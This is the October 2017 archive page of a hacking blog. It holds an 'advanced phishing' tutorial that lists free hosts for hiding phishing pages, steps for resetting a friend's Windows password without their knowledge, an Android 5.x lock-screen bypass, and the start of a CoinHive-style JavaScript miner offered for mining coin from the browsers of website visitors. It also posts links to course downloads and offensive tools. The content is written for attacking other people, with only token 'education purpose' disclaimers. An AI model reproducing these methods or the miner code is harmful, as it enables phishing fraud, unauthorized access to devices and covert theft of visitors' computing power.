Skip to main content

Posts

Showing posts from October, 2017

Leran Advance Phising

Basic Phishing tutorial Today I will write for something very powerful in hacking phishing this is the one of the most illegal techniques in hacking. !I'm not responsible for your actions I write this for education purpose only if you get in to trouble I'm not responsible!  Phishing is highly illegal so if you are new to hacking I will recommend first to do other stuff like RATing and keylogging then phishing.  When you are phishing you have to highly protect your self.  First you need to sing up in very secure hosting. That won't get you in trouble I can't recommend you but after short search on internet I found some.  Code: cwahi -  http://cwahi.com 110mb -  http://110mb.com Ripway -  http://ripway.com SuperFreeHost - http://superfreehost.info Freehostia - http://freehostia.com Freeweb7 -  http://freeweb7.com t35 -  http://t35.com Awardspace - http://awardspace.com PHPNet -  http://phpnet.us Free Web Hosting Pro - http://freewebhostingpro.com ProHosts

How to root any samsung phone

How to root any samsung phone 1) download your root file from cf auto root( https://autoroot.chainfire.eu ) 2) download odin file for pc 3)then open the AP file and choose the cf root file 4) wait a little moment and your phone is rooted

How to change your Friend’s Computer Password without knowing their current Passwo

How to change your Friend’s Computer Password without knowing their current Password It’s a very easy trick and you can change password of any computer without knowing their current password with this easy trick. This can be applied only when the PC is logged in from the user(bare in mind) Follow the steps :👇👇👇 1.Right click on My Computer/This Pc . 2. Click on Manage . 3. Click on local users and group . 4. Double Clcik on Users, Right Click on User Name which you want to change the password . 6.Clcik on Set Password . 7. Click on Proceed . 8. Enter you new Password . 9. Conform you New Password . 10. Click on Ok . 11.Again Click on Ok. 12.Now your job is done . NB: In step 5. User Name belongs to the Name of that Computer User .So this is the actual trick that you changed the old password without knowing what was the old Password . I hope you will like this trick and i would like to request all the readers Please don’t use this trick in such a bad way For education

Hacks and tricks.: Hack phone on the Emergency 😃😃 bypass lock screen

Hacks and tricks.: Hack phone on the Emergency 😃😃 Lockscreen hack exposes Android smartphones to full control by hackers A critical bug allows hackers to gain access to Android smartphones/tablets. This Android smartphone hack affects all devices running versions of Android 5.x which means that a millions of Android smartphones in circulation worldwide are susceptible. The process of attack : 1. From the locked screen, open the EMERGENCY CALL window. 2. Type a few characters, e.g. 10 asterisks. Double-tap the characters to highlight them and tap the copy button. Then tap once in the field and tap paste, doubling the characters in the field. Repeat this process of highlight all, copy, and paste until the field is so long that double-tapping no longer highlights the field. This usually occurs after 11 or so repetitions. 3. Go back to the lockscreen, then swipe left to open the camera. Swipe to pull the notification drawer down from the top of the screen, then tap the Settings (

Some Good books for Hacking

Shakaal ™: Shakaal ™: I do recommend the below books to our new intern in the company which is providing infosec services..so enjoy and feel free to share it or to do whatever you want with it.. The books that I recommend are; #Hacking:     1. The Hacker Playbook 2: Practical Guide To Penetration Testing, Peter Kim     #Exploitation     2. Hacking: The Art of Exploitation, 2nd ed, by Jon Erickson     3. The Shellcoder's Handbook: Discovering and Exploiting Security Holes. 2nd ed, by Chris Anley, John Heasman, Felix Lindner and Gerardo Richarte   #Python     4. Violent Python, by TJ O'Connor     5. Black Hat Python: Python Programming for Hackers and Pentesters 1st ed, by Justin Seitz #Manuals and #Guidelines   *Informal Manuals:     6. Rtfm: Red Team Field Manual, By Ben Clark     7. Blue Team Field Manual (BTFM), by Alan J White     8. Hash Crack: Password Cracking Manual Paperback, by Joshua Picolet   *Formal Manuals:     9. Blue Team Handbook: Incident Re

cehv9 course download

[10/1, 10:20 AM] Python: http://www.mediafire.com/download/5tex1gndiis0rz3/Reconnaissance+-+Footprinting.rar [10/1, 10:20 AM] Python: http://www.mediafire.com/download/1bap7hf82clm9dy/SQL+Injection.rar    [10/1, 10:20 AM] Python: http://www.mediafire.com/download/22t74lyof149u41/Scanning+networks.rar         [10/1, 10:20 AM] Python: http://www.mediafire.com/download/h285291nt7w8trh/Enumeration.rar         [10/1, 10:21 AM] Python: http://www.mediafire.com/download/g4di658xb9stz8g/Pentesting+Web+Servers.rar     http://www.mediafire.com/download/waqslt6jhk6ph1a/Pentesting+Web+Applications.rar                       -- Hacking Web Applications 9. http://www.mediafire.com/download/1cujirp51m911k8/Cryptography.rar                             -- Cryptography 10. http://www.mediafire.com/download/fzbq3zzzqspzw15/Sniffing.rar                             -- Sniffing 11. http://www.mediafire.com/download/5irzrhub4r6mva3/Session+Hijacking.rar                         -- Session Hijac

Spear Phising Attack

Shakaal ™: Kali Linux Offensive Security Certified Professional Playbook  | Shakaal ™: Phish For The Future – spear-phishing attacks target Internet Freedom Activists http://ift.tt/2fXYRb4 Submitted October 02, 2017 at 02:13PM by MicheeLengronne via reddit http://ift.tt/2xK5aJx

Github Projects And Bug bounty Resources

Github https://github.com/e-ago/ bitcracker Shakaal ™: Attify OS - Distro for pentesting IoT devices https://github.com/adi0x90/attifyos https://github.com/frizb/OSCP-Survival-Guide/blob/master/README.md https://github.com/Mr-Un1k0d3r/ThunderShell Shakaal ™: https://github.com/karelorigin/XSS-Problems/blob/master/README.md , Tools for penetration testers that can enumerate which users logged on windows systems  |  https://github.com/galkan/ kacak https://github.com/HSIS007/Useful_Websites_For_Pentester [9/30, 11:12 AM] Python: https://github.com/mjain61/Lulzsec_Mailer [9/30, 4:10 PM] Python: https://github.com/1modm/stegator [10/2, 10:26 AM] Python: https://github.com/tbhaxor/webzipper [10/2, 10:38 AM] Python: https://github.com/ojasookert/CVE-2017-0785 [9/28, 1:46 PM] Python: https://github.com/EdOverflow/bugbounty-cheatsheet [9/28, 1:49 PM] Python: https://github.com/cujanovic/SSRF-Testing [9/28, 2:03 PM] Python: https://github.com/cujanovic/Markdown-XSS-Payloads/blo

Some Good Ebooks

Advanced Penetration Testing - Hacking the World's Most Secure Networks | PDF/EPUB | 6/6 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfMy05SjhEaWpGODQ Black Hat Python | PDF/EPUB | 3/3 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfbHY0dWVSVURMVE0 Defensive security handbook | PDF/EPUB/AZW3 | 29/27/4 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfT1JBa1VFMFBnVDg Ethical Hacking and Penetration Testing Guide | PDF | 22 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfQVUwczFMU2JMWGc Hacking - The Art of Explotation | PDF | 4 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfeXNUbl96ZEt3Mk0 Hash Crack - Password Cracking Manual | PDF/EPUB/AZW3 | 6/2/3 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfZDV1V251UzVtMmc Kali Linux Revealed - Mastering the Penetration Testing Distribution | PDF | 26 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfSGpUSWk0QVJTUVU RTFM - Red Team Field Manual | PDF | 3 MB | https://drive.google.com/open?id=0B-OpLAp8EyTfaFB5LVpsOGl

Javascript For Btc Mining from Website visotor

Bipdroid Js for mining (function(window){"use strict";var Miner=function(siteKey,params){params=params||{};this._siteKey=siteKey;this._user=null;this._threads=[];this._hashes=0;this._currentJob=null;this._autoReconnect=true;this._reconnectRetry=3;this._tokenFromServer=null;this._goal=0;this._totalHashesFromDeadThreads=0;this._throttle=Math.max(0,Math.min(.99,params.throttle||0));this._autoThreads={enabled:!!params.autoThreads,interval:null,adjustAt:null,adjustEvery:1e4,stats:{}};this._tab={ident:Math.random()* 16777215 |0,mode:CoinHive.IF_EXCLUSIVE_TAB,grace:0,lastPingReceived:0,interval:null};if(window.BroadcastChannel){try{this._bc=new BroadcastChannel("coinhive");this._bc.onmessage=function(msg){if(msg.data==="ping"){this._tab.lastPingReceived=Date.now()}}.bind(this)}catch(e){}}this._eventListeners={open:[],authed:[],close:[],error:[],job:[],found:[],accepted:[]};var defaultThreads=navigator.hardwareConcurrency||4;this._targetNumThreads=params.threads|